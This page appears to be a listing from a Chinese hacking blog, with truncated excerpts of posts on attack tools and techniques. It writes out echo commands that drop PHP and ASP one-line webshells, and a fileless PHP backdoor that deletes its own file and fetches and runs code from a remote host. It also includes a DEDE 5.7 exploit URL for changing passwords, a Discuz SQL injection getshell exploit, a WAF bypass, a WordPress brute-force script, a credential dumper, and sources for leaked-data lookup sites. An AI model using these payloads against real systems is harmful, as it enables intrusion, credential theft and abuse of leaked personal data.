Quarks PwDump各种32位64系统获取HASH

Quarks PwDump 是一款开放源代码的Windows用户凭据提取工具,它可以抓取windows平台下多种类型的用户凭据,包括:本地帐户、域帐户、缓存的域帐户和Bitlocker。作者开发这个工具的原因是现在没有一款工具能同时抓取所有类型的hash和Bitlocker信息。这个工具没有注入任何进程,工作原理是神马呢,源代码值得读一下。 它目前可以导出 : – Local accounts N...

- 阅读全文 -

cmd生成webshell语句

linux:echo -e "<?@include(\$_POST["c"]);?>" > webshell.cc.php 会再同目录下生成webshell.cc.php一句话 密码:c win:      echo ^<%eval request("c")%^> >>webshell.cc.asp                   会再同目录下生成we...

- 阅读全文 -

社工库源码搜集

我接触的第一个社工库源码是Bamaba的源码 一个Asp+Sqlserver的源码 很简陋 大概就是这个界面 13年前后的大多数社工库都是这个源码改的 包括第一代QQ群查询 asp+sqlserver 单表查询 下载地址:bamaba 变形修改版:Q群登陆查询源码(当时毛都不会写,看到bamaba源码狂改而成)   CNSEU的源码 原来叫97bug吧 怀念一下 好多裤子 嘻嘻 &nbs...

- 阅读全文 -

Discuz! 7.2 SQL注入exp getshell版

参数: 1.可直接getshell 2.爆管理账号密码 3.爆表前缀 如果表前缀不是默认的cdb_ 只需更改代码中的 $table即可,方便快捷。       下载地址:DZ7.2  

- 阅读全文 -

K8大牛的C段旁注查询工具 V1.6

全部复制作者BLOG的懒得写了~ ------------------------------------------------------------------------------------------------------------------------------------------- 工具: K8_C段旁注查询工具 V1.6_20140618编译: VS2012  C#...

- 阅读全文 -

轻松绕各种WAF的POST注入、跨站防御(比如安全狗)

    XXX之前有提过multipart请求绕过各种WAF方式:360网站宝/安全宝/加速乐及其他类似产品防护绕过缺陷之一,貌似没引起多少人关注。今天发现安全狗变聪明了以前那套他不吃了,不过随手给狗提交了一个二进制的文件域就XXOO了。注意一定要是二进制文件,图片、压缩包什么的都行。 构建如下HTML表单: <!DOCTYPE html> &l...

- 阅读全文 -

PHP 无文件后门

  webshell.php <?php unlink($_SERVER['SCRIPT_FILENAME']); ignore_user_abort(true); set_time_limit(0); $remote_file = 'http://xsser.me/webshel.txt'; while($code = file_get_contents($remote_file...

- 阅读全文 -

最新WordPress账号密码暴力破解脚本

  在做渗透测试的时候,有时候会遇到一个wordpress博客, 如果版本比较新,插件也没有漏洞的话,可以爆破用户名密码来尝试下。 大脑混沌情况下写的,有bug欢迎提出,由于是php的所以跑起来比较慢, 下次发包还是调用命令结合hydra来爆破。 原理是通过URL /?author= 遍历获取用户名, 然后先跑用户名与密码相同的用户, 再调用同目录下pass.txt中的密码文件进行爆破。...

- 阅读全文 -

DEDE 5.7 综合利用 getshell

  修改密码:   /plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=1...

- 阅读全文 -

ecshop后台shell技术分享

之前出了几个ecshop漏洞,得到了密码但是都破解不出来,虽然知道后台。 用户密码 admin:d03a7617433c2826976062fec569a434 ecshop 有一个表ecs_shop_config ,里面有hash_code 貌似2.7.2 和2.7.3都是31693422540744c0a6b6da635b7a5a93 那就用之前的admin的密码和hash_code的 放在一...

- 阅读全文 -